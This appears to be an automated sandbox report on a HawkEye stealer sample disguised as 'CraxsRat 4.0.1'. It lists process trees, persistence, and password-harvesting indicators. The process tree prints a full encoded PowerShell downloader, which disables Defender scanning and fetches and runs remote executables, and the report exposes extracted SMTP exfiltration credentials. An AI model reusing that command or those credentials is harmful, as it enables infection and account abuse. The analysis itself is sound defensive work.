hawkeye | c4c920a877ab3a29cb2b7c3551c8100eca43e63d4f0b1e0648085ab5da670ee5

Analysis

max time kernel
61s
max time network
65s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
02-05-2023 17:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CraxsRat 4.0.1/CraxsRat 4.0.1.exe
Size

3.6MB
MD5

c03340af767421ec0ee35c378bbf3edb
SHA1

63060366f0bf2b4dcff3974deffca94b472b8773
SHA256

1dd45e5c7521156d2ca52d7aa5024e9fd3580ff6814a4b79161d7d730ecdb7ab
SHA512

70863a2729baa254fc5d0b92a8631e98596bb2ad497a5e607328cc49e32e254ec1f4309c8c085983cd70e2141be09d0429568f2aace061644c3d2d59ee39ab7f
SSDEEP

49152:7WsTEkwghTKv4jysGUqgCoOtt1JKsgGViSe8KuAfG9b/KMA:7FEkwghTKv4jysGUqgCxttdX8v/Ee

Score

10^/10

hawkeye collection keylogger persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/xau9i/raw

Extracted

Credentials

Protocol: smtp
Host:
smtp.zoho.com
Port:
587
Username:
nexusbuscasg@zohomail.com
Password:
Nescau71#

Signatures

HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
keylogger trojan stealer spyware hawkeye

NirSoft MailPassView 4 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/2708-176-0x0000000000400000-0x0000000000484000-memory.dmp	MailPassView
behavioral2/memory/1408-203-0x0000000000400000-0x000000000041B000-memory.dmp	MailPassView
behavioral2/memory/1408-205-0x0000000000400000-0x000000000041B000-memory.dmp	MailPassView
behavioral2/memory/1408-207-0x0000000000400000-0x000000000041B000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 4 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/2708-176-0x0000000000400000-0x0000000000484000-memory.dmp	WebBrowserPassView
behavioral2/memory/4728-213-0x0000000000400000-0x0000000000458000-memory.dmp	WebBrowserPassView
behavioral2/memory/4728-215-0x0000000000400000-0x0000000000458000-memory.dmp	WebBrowserPassView
behavioral2/memory/4728-222-0x0000000000400000-0x0000000000458000-memory.dmp	WebBrowserPassView

Nirsoft 7 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2708-176-0x0000000000400000-0x0000000000484000-memory.dmp	Nirsoft
behavioral2/memory/1408-203-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral2/memory/1408-205-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral2/memory/1408-207-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral2/memory/4728-213-0x0000000000400000-0x0000000000458000-memory.dmp	Nirsoft
behavioral2/memory/4728-215-0x0000000000400000-0x0000000000458000-memory.dmp	Nirsoft
behavioral2/memory/4728-222-0x0000000000400000-0x0000000000458000-memory.dmp	Nirsoft

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

15 2916 powershell.exe
17 2916 powershell.exe
Downloads MZ/PE file

flow	pid	process
15	2916	powershell.exe
17	2916	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

LX.exeCraxsRat 4.0.1.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	LX.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	CraxsRat 4.0.1.exe

Drops startup file 1 IoCs

Processes:

CraxsRat 4.0.1.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk CraxsRat 4.0.1.exe
Executes dropped EXE 5 IoCs

Processes:

CraxsRat 4.0.1.exeLX.exeCraxsRat 4.0.1.exeCraxsRat 4.0.1.exeCraxsRat 4.0.1.exe

pid process

1424 CraxsRat 4.0.1.exe
4436 LX.exe
3608 CraxsRat 4.0.1.exe
1372 CraxsRat 4.0.1.exe
2708 CraxsRat 4.0.1.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	CraxsRat 4.0.1.exe

pid	process
1424	CraxsRat 4.0.1.exe
4436	LX.exe
3608	CraxsRat 4.0.1.exe
1372	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

vbc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	vbc.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

CraxsRat 4.0.1.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe"	CraxsRat 4.0.1.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

22 whatismyipaddress.com
20 whatismyipaddress.com

flow	ioc
22	whatismyipaddress.com
20	whatismyipaddress.com

Suspicious use of SetThreadContext 3 IoCs

Processes:

CraxsRat 4.0.1.exeCraxsRat 4.0.1.exe

description	pid	process	target process
PID 1424 set thread context of 2708	1424	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 2708 set thread context of 1408	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 set thread context of 4728	2708	CraxsRat 4.0.1.exe	vbc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeCraxsRat 4.0.1.exepowershell.exeCraxsRat 4.0.1.exe

pid	process
2916	powershell.exe
2916	powershell.exe
1424	CraxsRat 4.0.1.exe
1424	CraxsRat 4.0.1.exe
1424	CraxsRat 4.0.1.exe
1424	CraxsRat 4.0.1.exe
4440	powershell.exe
4440	powershell.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe
2708	CraxsRat 4.0.1.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exeCraxsRat 4.0.1.exepowershell.exeCraxsRat 4.0.1.exe

description	pid	process
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	1424	CraxsRat 4.0.1.exe
Token: SeDebugPrivilege	4440	powershell.exe
Token: SeDebugPrivilege	2708	CraxsRat 4.0.1.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

CraxsRat 4.0.1.exe

pid process

2708 CraxsRat 4.0.1.exe

pid	process
2708	CraxsRat 4.0.1.exe

Suspicious use of WriteProcessMemory 41 IoCs

Processes:

CraxsRat 4.0.1.exeLX.exeCraxsRat 4.0.1.exepowershell.exeCraxsRat 4.0.1.exe

description	pid	process	target process
PID 4264 wrote to memory of 1424	4264	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4264 wrote to memory of 1424	4264	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4264 wrote to memory of 1424	4264	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4264 wrote to memory of 4436	4264	CraxsRat 4.0.1.exe	LX.exe
PID 4264 wrote to memory of 4436	4264	CraxsRat 4.0.1.exe	LX.exe
PID 4436 wrote to memory of 2916	4436	LX.exe	powershell.exe
PID 4436 wrote to memory of 2916	4436	LX.exe	powershell.exe
PID 1424 wrote to memory of 3608	1424	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1424 wrote to memory of 3608	1424	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1424 wrote to memory of 3608	1424	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1424 wrote to memory of 1372	1424	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1424 wrote to memory of 1372	1424	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1424 wrote to memory of 1372	1424	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1424 wrote to memory of 2708	1424	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1424 wrote to memory of 2708	1424	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1424 wrote to memory of 2708	1424	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1424 wrote to memory of 2708	1424	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1424 wrote to memory of 2708	1424	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1424 wrote to memory of 2708	1424	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1424 wrote to memory of 2708	1424	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1424 wrote to memory of 2708	1424	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 2916 wrote to memory of 4440	2916	powershell.exe	powershell.exe
PID 2916 wrote to memory of 4440	2916	powershell.exe	powershell.exe
PID 2708 wrote to memory of 1408	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 1408	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 1408	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 1408	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 1408	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 1408	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 1408	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 1408	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 1408	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 4728	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 4728	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 4728	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 4728	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 4728	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 4728	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 4728	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 4728	2708	CraxsRat 4.0.1.exe	vbc.exe
PID 2708 wrote to memory of 4728	2708	CraxsRat 4.0.1.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1\CraxsRat 4.0.1.exe
"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1\CraxsRat 4.0.1.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4264

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1424

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
3⤵
- Executes dropped EXE
PID:3608

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
3⤵
- Executes dropped EXE
PID:1372

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2708

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
4⤵
- Accesses Microsoft Outlook accounts
PID:1408

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
4⤵
PID:4728

C:\Users\Admin\AppData\Local\Temp\LX.exe
"C:\Users\Admin\AppData\Local\Temp\LX.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZgBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGMAZgBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHAAbQBtACMAPgA7ACIAOwA8ACMAcwBxAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBiAGcAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB0AGgAZwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAHgAYQAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AeABhAHUAOQBpAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBqAHoAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAbgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGUAdQBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBtAGIAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegBiAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAGgAaQBsACMAPgA="
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#cfg#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#pmm#>;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4440

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Scripting

T1064

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
Filesize
3.4MB

MD5
f873bee92e6118ff16b63b2a75173818

SHA1
4061cab004813a12e8042b83228885dfbc88547f

SHA256
7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d

SHA512
368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

Download Submit
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
Filesize
3.4MB

MD5
f873bee92e6118ff16b63b2a75173818

SHA1
4061cab004813a12e8042b83228885dfbc88547f

SHA256
7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d

SHA512
368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

Download Submit
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
Filesize
3.4MB

MD5
f873bee92e6118ff16b63b2a75173818

SHA1
4061cab004813a12e8042b83228885dfbc88547f

SHA256
7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d

SHA512
368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

Download Submit
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
Filesize
3.4MB

MD5
f873bee92e6118ff16b63b2a75173818

SHA1
4061cab004813a12e8042b83228885dfbc88547f

SHA256
7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d

SHA512
368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

Download Submit
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
Filesize
3.4MB

MD5
f873bee92e6118ff16b63b2a75173818

SHA1
4061cab004813a12e8042b83228885dfbc88547f

SHA256
7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d

SHA512
368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

Download Submit
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
Filesize
3.4MB

MD5
f873bee92e6118ff16b63b2a75173818

SHA1
4061cab004813a12e8042b83228885dfbc88547f

SHA256
7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d

SHA512
368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

Download Submit
C:\Users\Admin\AppData\Local\Temp\LX.exe
Filesize
74KB

MD5
1ab3092297d1806397e8d3a6747a3271

SHA1
ea114a2e5ddee915d30458031ec5ced7f97d1650

SHA256
2aa5d3e3abdcd8d31a11b9e1ac3d2e4b4075261f2e324833da229e3736a3ee6e

SHA512
1ab9ea47bbeb22688ba8ebcdbad144b794aabd29f1d4b0bfc2554cc1e9b28325e31b07e252b96ccd3851e49f9cdf935ded702a1cf83c343d69e357e4734caf28

Download Submit
C:\Users\Admin\AppData\Local\Temp\LX.exe
Filesize
74KB

MD5
1ab3092297d1806397e8d3a6747a3271

SHA1
ea114a2e5ddee915d30458031ec5ced7f97d1650

SHA256
2aa5d3e3abdcd8d31a11b9e1ac3d2e4b4075261f2e324833da229e3736a3ee6e

SHA512
1ab9ea47bbeb22688ba8ebcdbad144b794aabd29f1d4b0bfc2554cc1e9b28325e31b07e252b96ccd3851e49f9cdf935ded702a1cf83c343d69e357e4734caf28

Download Submit
C:\Users\Admin\AppData\Local\Temp\LX.exe
Filesize
74KB

MD5
1ab3092297d1806397e8d3a6747a3271

SHA1
ea114a2e5ddee915d30458031ec5ced7f97d1650

SHA256
2aa5d3e3abdcd8d31a11b9e1ac3d2e4b4075261f2e324833da229e3736a3ee6e

SHA512
1ab9ea47bbeb22688ba8ebcdbad144b794aabd29f1d4b0bfc2554cc1e9b28325e31b07e252b96ccd3851e49f9cdf935ded702a1cf83c343d69e357e4734caf28

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ia4ulzyi.sfh.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\holderwb.txt
Filesize
3KB

MD5
f94dc819ca773f1e3cb27abbc9e7fa27

SHA1
9a7700efadc5ea09ab288544ef1e3cd876255086

SHA256
a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92

SHA512
72a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196

Download Submit
memory/1408-203-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1408-205-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1408-207-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1424-160-0x00000000053C0000-0x0000000005964000-memory.dmp

Filesize
5.6MB

Download
memory/1424-157-0x0000000000070000-0x00000000003E0000-memory.dmp

Filesize
3.4MB

Download
memory/1424-159-0x0000000004D70000-0x0000000004E0C000-memory.dmp

Filesize
624KB

Download
memory/2708-200-0x0000000008AB0000-0x0000000008B16000-memory.dmp

Filesize
408KB

Download
memory/2708-176-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/2708-223-0x0000000005650000-0x0000000005660000-memory.dmp

Filesize
64KB

Download
memory/2708-212-0x0000000005650000-0x0000000005660000-memory.dmp

Filesize
64KB

Download
memory/2708-179-0x0000000005450000-0x00000000054E2000-memory.dmp

Filesize
584KB

Download
memory/2708-208-0x0000000005650000-0x0000000005660000-memory.dmp

Filesize
64KB

Download
memory/2708-192-0x0000000005320000-0x000000000532A000-memory.dmp

Filesize
40KB

Download
memory/2708-193-0x00000000055E0000-0x0000000005636000-memory.dmp

Filesize
344KB

Download
memory/2708-194-0x0000000005650000-0x0000000005660000-memory.dmp

Filesize
64KB

Download
memory/2916-210-0x000001E14D650000-0x000001E14D660000-memory.dmp

Filesize
64KB

Download
memory/2916-172-0x000001E14D650000-0x000001E14D660000-memory.dmp

Filesize
64KB

Download
memory/2916-171-0x000001E14D650000-0x000001E14D660000-memory.dmp

Filesize
64KB

Download
memory/2916-170-0x000001E14D5E0000-0x000001E14D602000-memory.dmp

Filesize
136KB

Download
memory/2916-211-0x000001E14D650000-0x000001E14D660000-memory.dmp

Filesize
64KB

Download
memory/2916-180-0x000001E14D650000-0x000001E14D660000-memory.dmp

Filesize
64KB

Download
memory/2916-209-0x000001E14D650000-0x000001E14D660000-memory.dmp

Filesize
64KB

Download
memory/4264-156-0x0000000000400000-0x000000000079B000-memory.dmp

Filesize
3.6MB

Download
memory/4436-155-0x00000000005A0000-0x00000000005B8000-memory.dmp

Filesize
96KB

Download
memory/4440-195-0x00000241C7E50000-0x00000241C7E60000-memory.dmp

Filesize
64KB

Download
memory/4440-181-0x00000241C7E50000-0x00000241C7E60000-memory.dmp

Filesize
64KB

Download
memory/4440-190-0x00000241C7E50000-0x00000241C7E60000-memory.dmp

Filesize
64KB

Download
memory/4728-213-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/4728-215-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/4728-222-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download